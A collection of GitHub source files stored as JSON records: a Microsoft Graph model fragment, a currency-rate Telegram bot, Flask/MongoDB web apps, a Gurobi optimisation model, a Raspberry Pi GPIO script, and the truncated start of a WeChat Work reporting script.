}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n super().serialize(writer)\n writer.write_time_value(\"activeHoursEnd\", self.active_hours_end)\n writer.write_time_value(\"activeHoursStart\", self.active_hours_start)\n writer.write_collection_of_enum_values(\"scheduledInstallDays\", self.scheduled_install_days)\n writer.write_int_value(\"utcTimeOffsetInMinutes\", self.utc_time_offset_in_minutes)\n \n\n","repo_name":"microsoftgraph/msgraph-sdk-python","sub_path":"msgraph/generated/models/ios_update_configuration.py","file_name":"ios_update_configuration.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"37"} +{"seq_id":"36966462394","text":"import yfinance as yf\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator, AutoMinorLocator, AutoLocator\nimport pandas as pd\n\n\"\"\"\nGlobal values for storing dollar and euro values. Updates every 20 sec in separate threads\nIf user set up signal, it produces another monitoring thread in signal_routine_dollar and \nsignal_routine_euro where this global values used. Maybe it's not the best practice to use global val \nfor storing information between threads... \n\"\"\"\n\ntransient_val_dollar = 0.0\ntransient_val_euro = 0.0\n\ndef daily_routine(context):\n USD = yf.Ticker(\"RUB=X\")\n EUR = yf.Ticker(\"EURRUB=X\")\n dfUSD = USD.history(period='2mo', interval='1d')\n dfEUR = EUR.history(period='2mo', interval='1d')\n draw_pic(dfUSD, 'dol')\n draw_pic(dfEUR, 'eur')\n\ndef show_dollar(context):\n global transient_val_dollar\n USD = yf.Ticker(\"RUB=X\")\n priceNow = USD.info['bid']\n # transient_val_dollar = priceNow\n return priceNow\n\ndef show_euro(context):\n global transient_val_euro\n EUR = yf.Ticker(\"EURRUB=X\")\n priceNow = EUR.info['bid']\n # transient_val_euro = priceNow\n return priceNow\n\"\"\"\ndef signal_message_dollar(context):\n context.bot.send_message(chat_id=context.job.context, text='')\n\ndef signal_message_euro(context):\n context.bot.send_message(chat_id=context.job.context, text='')\n\"\"\"\n\n\ndef signal_routine_dollar(context):\n #10:00:00 — 22:00:00\n jc = context.job.context['dol_data']\n user_ids = jc.keys()\n showDollar = show_dollar(context)\n for id_ in user_ids:\n if id_ is None:\n continue\n _trig_less = jc[id_]['trig_less']\n _trig_more = jc[id_]['trig_more']\n if showDollar > jc[id_]['val']:\n if _trig_less:\n context.bot.send_message(chat_id=id_,\n text='Обратите внимание на курс доллара!\\n'\n 'Ваш сигнал {}'.format(jc[id_]['val']))\n _trig_less = False\n _trig_more = True\n if showDollar < jc[id_]['val']:\n if _trig_more:\n context.bot.send_message(chat_id=id_,\n text='Обратите внимание на курс доллара!\\n'\n 'Ваш сигнал {}'.format(jc[id_]['val']))\n _trig_less = True\n _trig_more = False\n jc[id_]['trig_less'] = _trig_less\n jc[id_]['trig_more'] = _trig_more\n\n\ndef signal_routine_euro(context):\n #10:00:00 — 22:00:00\n jc = context.job.context['eur_data']\n user_ids = jc.keys()\n showEuro = show_euro(context)\n for id_ in user_ids:\n if id_ is None:\n continue\n _trig_less = jc[id_]['trig_less']\n _trig_more = jc[id_]['trig_more']\n if showEuro > jc[id_]['val']:\n if _trig_less:\n context.bot.send_message(chat_id=id_,\n text='Обратите внимание на курс евро!\\n'\n 'Ваш сигнал {}'.format(jc[id_]['val']))\n _trig_less = False\n _trig_more = True\n if showEuro < jc[id_]['val']:\n if _trig_more:\n context.bot.send_message(chat_id=id_,\n text='Обратите внимание на курс евро!\\n'\n 'Ваш сигнал {}'.format(jc[id_]['val']))\n _trig_less = True\n _trig_more = False\n jc[id_]['trig_less'] = _trig_less\n jc[id_]['trig_more'] = _trig_more\n\ndef draw_pic(dataframe, currency):\n # check types\n if not isinstance(dataframe, pd.DataFrame):\n raise TypeError('{} should be Pandas.DataFrame object'.format(dataframe))\n if not (currency == 'dol') | (currency == 'eur'):\n raise NameError('{} should be \\'dol\\' or \\'eur\\''.format(currency))\n\n # Draw pic\n fig, ax = plt.subplots(figsize=(10, 7))\n\n mean_val = dataframe.loc[:, ['High', 'Low']].mean(axis=1)\n x_values = dataframe.index.strftime('%b %d')\n\n ax.fill_between(x_values, dataframe['High'], dataframe['Low'], color='Purple', alpha=0.2)\n ax.plot(x_values, mean_val, linewidth=2, color='Purple')\n\n ax.tick_params(axis='x', direction='out', length=8)\n ax.xaxis.set_major_locator(MultipleLocator(4))\n ax.yaxis.set_major_locator(AutoLocator())\n ax.xaxis.set_minor_locator(AutoMinorLocator())\n ax.grid(which='both')\n for tick in ax.get_xticklabels():\n tick.set_rotation(45)\n if currency == 'dol':\n ax.set_title('USD/RUB', fontsize=16, pad=25)\n ax.set_ylabel('RUB per USD')\n fig.savefig('picDol.png')\n if currency == 'eur':\n ax.set_title('EUR/RUB', fontsize=16, pad=25)\n ax.set_ylabel('RUB per EUR')\n fig.savefig('picEur.png')\n","repo_name":"pinchazer/myTelegramBot","sub_path":"dataobtain.py","file_name":"dataobtain.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34155100449","text":"\"\"\" Python app-code \"\"\"\nimport os\nfrom flask import (\n Flask, flash, render_template, redirect, request, session, url_for)\nfrom flask_pymongo import PyMongo\nfrom bson.objectid import ObjectId\nfrom werkzeug.security import generate_password_hash, check_password_hash\nif os.path.exists(\"env.py\"):\n import env\n\n\napp = Flask(__name__)\n\napp.config[\"MONGO_DBNAME\"] = os.environ.get(\"MONGO_DBNAME\")\napp.config[\"MONGO_URI\"] = os.environ.get(\"MONGO_URI\")\napp.secret_key = os.environ.get(\"SECRET_KEY\")\n\n\n\"\"\" Set up an instance of PyMongo\n (insure Flask app is communicating with MongoDB) \"\"\"\nmongo = PyMongo(app)\n\n\n@app.route(\"/\") # default url also leads to this\n@app.route(\"/home_page\")\ndef home_page():\n return render_template(\"index.html\")\n\n\n@app.route(\"/get_shoes\")\ndef get_shoes():\n \"\"\" Retrieve all shoes for Gallery-page \"\"\"\n shoes = list(mongo.db.shoes.find())\n return render_template(\"shoes.html\", shoes=shoes)\n\n\n@app.route(\"/search\", methods=[\"GET\", \"POST\"])\ndef search():\n query = request.form.get(\"query\")\n shoes = list(mongo.db.shoes.find({\"$text\": {\"$search\": query}}))\n return render_template(\"shoes.html\", shoes=shoes)\n\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n if request.method == \"POST\":\n # Check if username already exists in database\n existing_user = mongo.db.users.find_one(\n {\"username\": request.form.get(\"username\").lower()})\n\n if existing_user:\n flash(\"This username already exists! Please try again.\")\n return redirect(url_for(\"register\"))\n\n register = {\n \"username\": request.form.get(\"username\").lower(),\n \"password\": generate_password_hash(request.form.get(\"password\")),\n \"email\": request.form.get(\"email\").lower()\n }\n mongo.db.users.insert_one(register)\n\n # Put the new user into a \"session\"-cookie\n session[\"user\"] = request.form.get(\"username\").lower()\n flash(\"Registration successful! You may now upload and share your own favourite shoes!\")\n return redirect(url_for(\"profile\", username=session[\"user\"]))\n return render_template(\"register.html\")\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n if request.method == \"POST\":\n # Check if username already exists in database\n existing_user = mongo.db.users.find_one(\n {\"username\": request.form.get(\"username\").lower()})\n\n if existing_user:\n # Check if entered password matches hashed password in db\n if check_password_hash(\n existing_user[\"password\"], request.form.get(\"password\")):\n session[\"user\"] = request.form.get(\"username\").lower()\n flash(\"Welcome, {}\".format(request.form.get(\"username\")))\n return redirect(url_for(\"profile\", username=session[\"user\"]))\n\n else:\n # If password doesn't match\n flash(\"Incorrect username and/or password\")\n return redirect(url_for(\"login\"))\n\n else:\n # If username doesn't exist\n flash(\"Incorrect username and/or password\")\n return redirect(url_for(\"login\"))\n\n return render_template(\"login.html\")\n\n\n@app.route(\"/profile/\", methods=[\"GET\", \"POST\"])\ndef profile(username):\n # Grab the session-user's username from db (and only username)\n username = mongo.db.users.find_one({\"username\": session[\"user\"]})[\"username\"]\n shoes = list(mongo.db.shoes.find())\n\n if session[\"user\"]:\n return render_template(\"profile.html\", shoes=shoes, username=username)\n\n # If session-cookie is gone, redirect to login (for security)\n return redirect(url_for(\"login\"))\n\n\n@app.route(\"/logout\")\ndef logout():\n # Remove the users session-cookie to log out\n flash(\"You have been logged out.\")\n session.pop(\"user\")\n return redirect(url_for(\"login\"))\n\n\n@app.route(\"/add_shoes\", methods=[\"GET\", \"POST\"])\ndef add_shoes():\n if request.method == \"POST\":\n is_private = \"yes\" if request.form.get(\"is_private\") else \"no\"\n shoes = {\n \"category_name\": request.form.get(\"category_name\"),\n \"shoes_name\": request.form.get(\"shoes_name\"),\n \"shoes_description\": request.form.get(\"shoes_description\"),\n \"brand_name\": request.form.get(\"brand_name\"),\n \"comfort_level\": request.form.get(\"comfort-level\"),\n \"design_level\": request.form.get(\"design-level\"),\n \"construction_level\": request.form.get(\"construction-level\"),\n \"heel_height\": request.form.get(\"heel_height\"),\n \"toe_shape\": request.form.get(\"toe_shape\"),\n \"shoes_image\": request.form.get(\"shoes_image\"),\n \"username\": session[\"user\"],\n \"date_added\": request.form.get(\"date_added\"),\n \"is_private\": is_private\n }\n mongo.db.shoes.insert_one(shoes)\n flash(\"New shoes successfully added!\")\n return redirect(url_for(\"get_shoes\"))\n\n categories = mongo.db.categories.find().sort(\"category_name\", 1)\n return render_template(\"add_shoes.html\", categories=categories)\n\n\n@app.route(\"/edit_shoes/\", methods=[\"GET\", \"POST\"])\ndef edit_shoes(shoes_id):\n if request.method == \"POST\":\n is_private = \"yes\" if request.form.get(\"is_private\") else \"no\"\n submit = {\n \"category_name\": request.form.get(\"category_name\"),\n \"shoes_name\": request.form.get(\"shoes_name\"),\n \"shoes_description\": request.form.get(\"shoes_description\"),\n \"brand_name\": request.form.get(\"brand_name\"),\n \"comfort_level\": request.form.get(\"comfort-level\"),\n \"design_level\": request.form.get(\"design-level\"),\n \"construction_level\": request.form.get(\"construction-level\"),\n \"heel_height\": request.form.get(\"heel_height\"),\n \"toe_shape\": request.form.get(\"toe_shape\"),\n \"shoes_image\": request.form.get(\"shoes_image\"),\n \"username\": session[\"user\"],\n \"date_added\": request.form.get(\"date_added\"),\n \"is_private\": is_private\n }\n mongo.db.shoes.update_one({\"_id\": ObjectId(shoes_id)}, {\"$set\": submit})\n flash(\"Record successfully updated.\")\n return redirect(url_for('profile', username=session['user']))\n\n shoes = mongo.db.shoes.find_one({\"_id\": ObjectId(shoes_id)})\n\n categories = mongo.db.categories.find().sort(\"category_name\", 1)\n return render_template(\"edit_shoes.html\", shoes=shoes, categories=categories)\n\n\n@app.route(\"/delete_shoes/\")\ndef delete_shoes(shoes_id):\n mongo.db.shoes.delete_one({\"_id\": ObjectId(shoes_id)})\n flash(\"This record has now been deleted\")\n return redirect(url_for('profile', username=session['user']))\n\n\n@app.route(\"/get_categories\")\ndef get_categories():\n categories = list(mongo.db.categories.find().sort(\"category_name\", 1))\n return render_template(\"categories.html\", categories=categories)\n\n\n@app.route(\"/add_category\", methods=[\"GET\", \"POST\"])\ndef add_category():\n if request.method == \"POST\":\n category = {\n \"category_name\": request.form.get(\"category_name\")\n }\n mongo.db.categories.insert_one(category)\n flash(\"New category successfully added.\")\n return redirect(url_for(\"get_categories\"))\n\n return render_template(\"add_category.html\")\n\n\n@app.route(\"/edit_category/\", methods=[\"GET\", \"POST\"])\ndef edit_category(category_id):\n if request.method == \"POST\":\n submit = {\n \"category_name\": request.form.get(\"category_name\")\n }\n mongo.db.categories.update_one({\"_id\": ObjectId(category_id)}, {\"$set\": submit})\n flash(\"Category successfully updated.\")\n return redirect(url_for(\"get_categories\"))\n\n category = mongo.db.categories.find_one({\"_id\": ObjectId(category_id)})\n return render_template(\"edit_category.html\", category=category)\n\n\n@app.route(\"/delete_category/\")\ndef delete_category(category_id):\n mongo.db.categories.delete_one({\"_id\": ObjectId(category_id)})\n flash(\"Category successfully deleted.\")\n return redirect(url_for(\"get_categories\"))\n\n\n# Run app\nif __name__ == \"__main__\":\n app.run(host=os.environ.get(\"IP\"),\n port=int(os.environ.get(\"PORT\")),\n debug=False)\n","repo_name":"Gurimarie/my_favourite_shoes","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24461601894","text":"import gurobipy as gp\nfrom gurobipy import GRB\nfrom pandas import *\nimport numpy as np\nimport pandas as pd\nfrom preprocessing.ParameterSet import *\n\n\ndef execute_superblock(pm):\n\n m = gp.Model('Superblock')\n\n\n # decision variables\n visitors = {}\n for g1 in pm.set_G:\n for g2 in pm.set_G:\n for i in pm.set_I:\n #print(\"are here\")\n visitors[g1, g2, i] = m.addVar(vtype=GRB.CONTINUOUS, name='visitors from gate '+ str(g1)+' to gate ' + str(g2)+ ' for center type '+ str(i))\n\n selfVisitors = {}\n for sb in pm.set_SB:\n for i in pm.set_I:\n selfVisitors[sb, i] = m.addVar(vtype=GRB.CONTINUOUS, name='selfVisitors from sb '+str(sb)+' for center '+str(i))\n\n visFreq = {}\n for sb in pm.set_SB:\n for i in pm.set_I:\n visFreq[sb, i] = m.addVar(vtype=GRB.CONTINUOUS, name='visFreq of sb '+str(sb) +' for center '+str(i))\n\n placementKey = {}\n for sb2 in pm.set_SB:\n for i in pm.set_I:\n #print(\"are here_2\")\n placementKey[sb2, i] = m.addVar(vtype=GRB.BINARY, name='placementKey for sb' + str(sb2) + ' and center ' + str(i))\n\n z = {}\n for g1 in pm.set_G:\n for g2 in pm.set_G:\n for i in pm.set_I:\n #print(\"are here 3\")\n z[g1, g2, i] = m.addVar(vtype=GRB.BINARY, name='z ' + str(g1) + ' ' + str(g2) + ' ' + str(i))\n\n m.update()\n\n # objective function\n # Minimize sum of traveled distances\n m.setObjective(sum(sum(sum(visitors[g1, g2, i] * pm.distances.iloc[g1, g2]\n for g2 in pm.set_G) for g1 in pm.set_G)for i in pm.set_I), GRB.MINIMIZE)\n\n # constraints\n # constraint 1\n # Sum of all Visitors and selfVisitors from a specific gate in a superblock\n # to all general gates, for a specific center\n # equal the visitor frequency for the specific center for all superblocks and all specific centers\n for sb in pm.set_SB:\n gates_of_sb = pm.subset_G_SB[sb] # e.g. sb = 1 G_sb = [0, 1]; sb = 2 G_sb = [2, 3]\n for i in pm.set_I:\n m.addConstr((sum(sum(visitors[g1, g2, i] for g2 in pm.set_G)\n for g1 in gates_of_sb) + selfVisitors[sb, i] == visFreq[sb, i]), \"1\")\n\n # constraint 1a\n # Greater/equal zero constraint for visitors for all general gates and all specific centers\n for g1 in pm.set_G:\n for g2 in pm.set_G:\n for i in pm.set_I:\n m.addConstr((visitors[g1, g2, i] >= 0), \"1a\")\n\n # constraint 1b\n # Greater/equal zero constraint for selfVisitors for all superblocks and all specific centers\n for sb in pm.set_SB:\n for i in pm.set_I:\n m.addConstr((selfVisitors[sb, i] >= 0), \"1b\")\n\n\n # constraint 1c\n # visitors from g1 of sb to g2 of sb must be equal to zero for all superblocks,\n # for all block specific gates and all specific centers\n for sb in pm.set_SB:\n gates_of_sb = pm.subset_G_SB[sb]\n for g1 in gates_of_sb:\n for g2 in gates_of_sb:\n for i in pm.set_I:\n m.addConstr((visitors[g1, g2, i] == 0), \"1c\")\n\n # constraint 1d\n # make sure that the selfVisitors aren't too large for a realistic value (to prevent it does not get artificially\n # increased to fulfill the min. center utilization constraint)\n # still can change the factor for demand\n for sb in pm.set_SB:\n for c in pm.set_C:\n for i_c in (pm.subset_I_c[c]):\n m.addConstr((selfVisitors[sb, i_c] <= pm.demand_c[c] * 3), \"1d\")\n\n # constraint 2a\n # Sum of visitors frequency overall superblocks is greater/equal to minimal required utilization for all center types\n # and for all specific centers\n for c in pm.set_C:\n for i_c in (pm.subset_I_c[c]):\n m.addConstr(sum(visFreq[sb, i_c] for sb in pm.set_SB) >= pm.capacity_c[c] * pm.beta[c] * sum(\n placementKey[sb, i_c] for sb in pm.set_SB), \"2a\")\n\n # constraint 2b\n # Sum of visitors frequency overall superblocks is less/equal the utilization for all center types\n # and for all specific centers\n for c in pm.set_C:\n #print(\"2b\")\n for i_c in (pm.subset_I_c[c]):\n m.addConstr(sum(visFreq[sb, i_c] for sb in pm.set_SB) <= pm.capacity_c[c], \"2b\")\n\n # constraint 3\n # Sum of visitor frequency overall specific centers is greater/equal center type demand d\n # for all center types and all superblocks\n for c in pm.set_C:\n for sb in pm.set_SB:\n if sb not in pm.subset_SB_with_GC:\n m.addConstr((sum(visFreq[sb, i_c] for i_c in (pm.subset_I_c[c])) >= pm.demand_c[c]), \"3\")\n\n # constraint 4a\n # Big M constraint\n # if center is placed, visitors must be less than threshold M for all superblocks, for all general centers,\n # for all general gates and for block specific gates (to make sure that visitor's don't visit a center instance i\n # that hasn't been build)\n for sb in pm.set_SB: # we loop through all sb's that potentially have the center instance i\n gates_of_sb = pm.subset_G_SB[sb]\n for i in pm.set_I:\n for g1 in pm.set_G:\n for g2 in gates_of_sb:\n m.addConstr((visitors[g1, g2, i]\n <= placementKey[sb, i] * pm.M), \"4a\")\n\n # constraint 4b\n # Big M constraint\n # If center is placed visitors to SelfVisitors to center must be less than threshold M for all superblocks\n # and for all general centers\n for sb in pm.set_SB:\n #print(\"4b\")\n for i in pm.set_I:\n m.addConstr((selfVisitors[sb, i]\n <= placementKey[sb, i] * pm.M), \"4b\")\n\n # constraint 4c\n # Sum of placementKey overall superblocks must be less/equal 1 for all general centers\n # (each center can only be placed maximal once)\n for i in pm.set_I:\n m.addConstr(sum(placementKey[sb, i] for sb in pm.set_SB) <= 1, \"4c\")\n\n # constraint 5\n # Distances that are traveled from g1 to g2 for a specific center must be less/equal the maxDistance\n # per center type for all center types, specific centers and general gates\n for c in pm.set_C:\n for i_c in pm.subset_I_c[c]:\n for g1 in pm.set_G:\n for g2 in pm.set_G:\n m.addConstr((z[g1, g2, i_c] * (pm.distances.iloc[g1, g2]) <= pm.max_dist_c[c]), \"5\")\n\n # constraint 5a\n # Big M constraint that sets z[g1, g2, i] == 1 if there are visitors from g1 to g2 for i\n for c in pm.set_C:\n\n #print(\"5a\")\n for i in pm.subset_I_c[c]:\n for g1 in pm.set_G:\n for g2 in pm.set_G:\n m.addConstr((visitors[g1, g2, i] <= z[g1, g2, i] * pm.M), \"5a\")\n\n # constraint 6\n # The areas of all placed specific centers must be less/equal the maximum available area\n # in a superblock for all superblocks. The max. area is 0 in case the superblock is reserved for gigacenter.\n # Therefore, we just sum up all c's that are not giga centers.\n for sb in pm.set_SB:\n if sb not in pm.subset_SB_with_GC:\n m.addConstr(sum(sum(pm.area_c[c] * placementKey[sb, i] for i in (pm.subset_I_c[c])) for c in\n list(set(pm.set_C))) <= pm.max_area_per_sb[sb], \"6aa\")\n else:\n m.addConstr(sum(sum(pm.area_c[c] * placementKey[sb, i] for i in (pm.subset_I_c[c])) for c in\n list(set(pm.set_C) - set(pm.subset_C_gigac))) <= pm.max_area_per_sb[sb], \"6ab\")\n\n\n # constraint 6a\n # The placement key is already defined for sb's that are reserved for gigacenter:\n for sb in pm.subset_SB_with_GC:\n # look up assigned center typ\n assigned_centertyp = pm.dict_sb_giga_centertype[sb]\n assigned_center_instances = pm.subset_I_c[assigned_centertyp]\n m.addConstr(sum(placementKey[sb, i] for i in assigned_center_instances) == 1)\n\n\n # constraint 7a\n # A given proportion from the superblock demand for commercial building centers has to go to zone 1\n for sb in pm.set_SB:\n if sb not in pm.subset_SB_with_GC:\n for c_commerc in pm.subset_C_commc:\n\n m.addConstr(sum(sum(sum(visitors[g1, g2, i] for g2 in pm.subset_G_zone1[g1]) for g1 in pm.subset_G_SB[sb])\n for i in pm.subset_I_c[c_commerc]) >= pm.demand_c[c_commerc] * pm.prop_demand_zone1)\n\n # constraint 7b\n # A given proportion from the superblock demand for commercial building centers has to go to zone 2\n for sb in pm.set_SB:\n if sb not in pm.subset_SB_with_GC:\n for c_commerc in pm.subset_C_commc:\n m.addConstr(sum(\n sum(sum(visitors[g1, g2, i] for g2 in pm.subset_G_zone2[g1]) for g1 in pm.subset_G_SB[sb]) for i in\n pm.subset_I_c[c_commerc]) >= pm.demand_c[c_commerc] * pm.prop_demand_zone2)\n\n\n # symmetry breaking constraint\n for c in pm.set_C:\n for i in pm.subset_I_c[c]:\n if i <= len(pm.subset_I_c[c]) - 1:\n m.addConstr(\n sum(placementKey[sb, i] for sb in pm.set_SB) >= sum(placementKey[sb, i + 1] for sb in pm.set_SB))\n\n # execution\n m.Params.TimeLimit = 500\n m.optimize()\n\n #for v in m.getVars():\n # if (v.x > 0):\n # print('%s %g' % (v.varName, v.x))\n\n return m, m.getVars();\n\n\nparams = Params([[5,'Hospital'],[6,'University'],[9,'Industry']])\n\n\nm, result = execute_superblock(params)\n\ndef create_output(model):\n\n visitors = [] #{}\n for g1 in params.set_G:\n for g2 in params.set_G:\n for i in params.set_I:\n value = str(model.getVarByName('visitors from gate '+ str(g1) +' to gate ' + str(g2)+ ' for center type '+ str(i)))\n value = value.split('value')[1]\n value = value.split('.')[0]\n visitors.append({'g1': g1,\n 'g2': g2,\n 'i': i,\n 'visitors': int(value)})\n #visitors[g1,g2,i] = int(value)\n visitors = pd.DataFrame(visitors, index = None)\n\n\n selfVisitors = [] #{}\n for sb in params.set_SB:\n for i in params.set_I:\n value = str(model.getVarByName('selfVisitors from sb '+str(sb)+' for center '+str(i)))\n value = value.split('value')[1]\n value = value.split('.')[0] \n selfVisitors.append({'sb': sb,\n 'i': i,\n 'selfVisitors': int(value)})\n #selfVisitors[sb,i] = int(value)\n selfVisitors = pd.DataFrame(selfVisitors, index = None)\n\n\n visFreq = [] #{}\n for sb in params.set_SB:\n for i in params.set_I:\n value = str(model.getVarByName('visFreq of sb '+str(sb) +' for center '+str(i)))\n value = value.split('value')[1]\n value = value.split('.')[0] \n visFreq.append({'sb': sb,\n 'i': i,\n 'centername': params.dict_centerinstance_centertype[i],\n 'visFreq': int(value)})\n #visFreq[sb,i] = int(value)\n visFreq = pd.DataFrame(visFreq, index = None)\n\n\n placementKey = [] #{}\n for sb2 in params.set_SB:\n for i in params.set_I:\n value = str(model.getVarByName('placementKey for sb' + str(sb2) + ' and center ' + str(i))).split('value')[1]\n value = value.split('.')[0]\n placementKey.append({'sb2': sb2,\n 'i': i,\n 'centername':params.dict_centerinstance_centertype[i],\n 'placementKey': int(value)})\n #placementKey[sb,i] = int(value)\n placementKey = pd.DataFrame(placementKey, index = None)\n\n z = []#{}\n for g1 in params.set_G:\n for g2 in params.set_G:\n for i in params.set_I:\n value = str(model.getVarByName('z ' + str(g1) + ' ' + str(g2) + ' ' + str(i))).split('value')[1]\n value = value.split('.')[0]\n z.append({'g1': g1,\n 'g2': g2,\n 'i': i,\n 'z': int(value)})\n #z[g1,g2,i] = int(value)\n z = pd.DataFrame(z, index = None)\n\n return visitors, selfVisitors, visFreq, placementKey, z\n \nvisitors,selfVisitors, visFreq, placementKey,z = create_output(m)\n\nwriter = pandas.ExcelWriter('Output_4x4.xlsx')\n\nplacementKey.to_excel(writer, \"PlacementKey\")\nvisitors.to_excel(writer, \"Visitors\")\nvisFreq.to_excel(writer, \"VisFreq\")\nz.to_excel(writer,\"z\")\nselfVisitors.to_excel(writer,\"SelfVisitors\")\n\n\n\nwriter.save()\n\"\"\"\nplacementKey.to_excel('output\\dummy.xlsx', 'placementKey')\nvisitors.to_excel('output\\dummy.xlsx', 'visitors')\nselfVisitors.to_excel('output\\dummy.xlsx', 'selfVisitors')\n\nvisFreq.to_excel('output\\dummy.xlsx', 'visFreq')\nz.to_excel('output\\dummy.xlsx', 'z')\n\"\"\"\n\n\n\n\n","repo_name":"TheresaGittew/superblock","sub_path":"Superblock_MILP_funct.py","file_name":"Superblock_MILP_funct.py","file_ext":"py","file_size_in_byte":13013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"44062954014","text":"from flask import Flask\nfrom flask import render_template, request, jsonify\nimport re\nimport os\nimport json\nimport plotly\nimport sqlalchemy\nimport joblib\nimport pandas as pd\nimport numpy as np\nimport nltk\nnltk.download(['punkt', 'wordnet', 'stopwords'])\n\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom plotly.graph_objs import Bar\nfrom sqlalchemy import create_engine\n\napp = Flask(__name__)\n\ndef tokenize(text):\n #Normalize text & remove punctuation\n text = text.lower()\n text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text)\n \n #Tokenize text, remove stop words\n tokens = word_tokenize(text)\n stop_words = stopwords.words(\"english\")\n words = [w for w in tokens if w not in stop_words]\n \n\n # Reduce words to their root form\n lemmatizer = WordNetLemmatizer()\n lemmed = [lemmatizer.lemmatize(w) for w in words]\n \n return lemmed\n\n# Load Data\n#engine = create_engine('sqlite:////home/workspace/data/DisasterResponse.db')\n#engine = create_engine('sqlite:////C/1DATA/Prasanna/Udacity/dis_pipe/Workspace/data/DisasterResponse.db')\nengine = create_engine('sqlite:///../data/DisasterResponse.db')\ndf = pd.read_sql_table('Messages', engine)\n \n# load modelDisasterResponse.db\n#model = joblib.load('/home/workspace/models/classifier.pkl')\nmodel = joblib.load('../models/classifier.pkl')\n \n# index webpage displays cool visuals and receives user input text for model\n@app.route('/')\n@app.route('/index')\ndef index():\n \n '''prepare plotly graphs and layout to dump to json\n for html frontend use\n '''\n # extract data needed for visuals\n genre_counts = df.groupby('genre').count()['message']\n genre_names = list(genre_counts.index)\n \n # Distribution of different categoies\n category = list(df.columns[4:])\n category_counts = []\n for col_name in category:\n category_counts.append(np.sum(df[col_name]))\n \n # Top words\n T_wd = pd.Series(' '.join(df['message']).lower().split())\n Top_Words = T_wd[~T_wd.isin(stopwords.words(\"english\"))].value_counts()[:10]\n T_W_Names = list(Top_Words.index) \n \n # create visuals\n graphs = [\n {\n 'data': [\n Bar(\n x=genre_names,\n y=genre_counts\n )\n ],\n\n 'layout': {\n 'title': 'Distribution of Message Genres',\n 'yaxis': {\n 'title': \"Count\"\n },\n 'xaxis': {\n 'title': \"Genre\"\n }\n }\n },\n \n {\n 'data': [\n Bar(\n x=category,\n y=category_counts\n )\n ],\n\n 'layout': {\n 'title': 'Distribution of Message Categories',\n 'yaxis': {\n 'title': \"Count\"\n },\n 'xaxis': {\n 'title': \"Category\"\n }\n }\n },\n {\n 'data': [\n Bar(\n x=T_W_Names,\n y=Top_Words\n )\n ],\n\n 'layout': {\n 'title': 'Frequent Words',\n 'yaxis': {\n 'title': \"Count\"\n },\n 'xaxis': {\n 'title': \"Words\"\n }\n }\n } \n ]\n \n # encode plotly graphs in JSON\n ids = [\"graph-{}\".format(i) for i, _ in enumerate(graphs)]\n graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)\n \n # render web page with plotly graphs\n return render_template('master.html', ids=ids, graphJSON=graphJSON)\n\n\n# web page that handles user query and displays model results\n@app.route('/go')\ndef go():\n # save user input in query\n query = request.args.get('query', '') \n\n # use model to predict classification for query\n classification_labels = model.predict([query])[0]\n classification_results = dict(zip(df.columns[4:], classification_labels))\n\n # This will render the go.html Please see that file. \n return render_template(\n 'go.html',\n query=query,\n classification_result=classification_results\n )\n\n\ndef main():\n app.run(host='0.0.0.0', port=3001, debug = True)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"prasannakr/Disaster_Response_Pipeline","sub_path":"Workspace/app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14480582929","text":"# NODE\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\nGPIO.setup(26, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(19, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(6, GPIO.OUT)\n\nready_for_heartbreak = False\n\ndef smile(channel):\n GPIO.output(6, GPIO.HIGH)\n print('thats the stuff')\n ready_for_heartbreak = True\n \nGPIO.add_event_detect(26, GPIO.FALLING, callback=smile, bouncetime=200)\n\nprint('my heart..')\n\nwhile(True):\n try:\n GPIO.wait_for_edge(19, GPIO.FALLING)\n GPIO.output(6, GPIO.LOW)\n except(KeyboardInterrupt):\n GPIO.cleanup()\n","repo_name":"syscnode/icebreaker","sub_path":"NODE.py","file_name":"NODE.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14711667373","text":"#! /usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n# @Date : 2018-07-20 17:08:55\n# @Author : Hume (102734075@qq.com)\n# @Link : https://humecry.wordpress.com/\n# @Version : 1.0\n# @Description: 生成每周日报, 发送到企业微信, 附加定时发送功能\n\nimport requests\nimport urllib\nimport time\nimport json\n# from apscheduler.schedulers.blocking import BlockingScheduler\n# 引入配置文件\nfrom conf import *\n# 引入公共函数\nfrom common import *\n# 引入自建模块\nimport jd\nimport passengerFlow\nimport unusual\n\n# 企业微信接口\nclass Wxwork:\n\t# 初始化\n\tdef __init__(self):\n\t\tself.token = self.get_token() #获取令牌\n\t\tself.chat = \"12379832426587121255\" #测试群Id\n\t# 获取token\n\tdef get_token(self):\n\t\ttoken_url = \"https://qyapi.weixin.qq.com/cgi-bin/gettoken\"\n\t\ttoken_params = 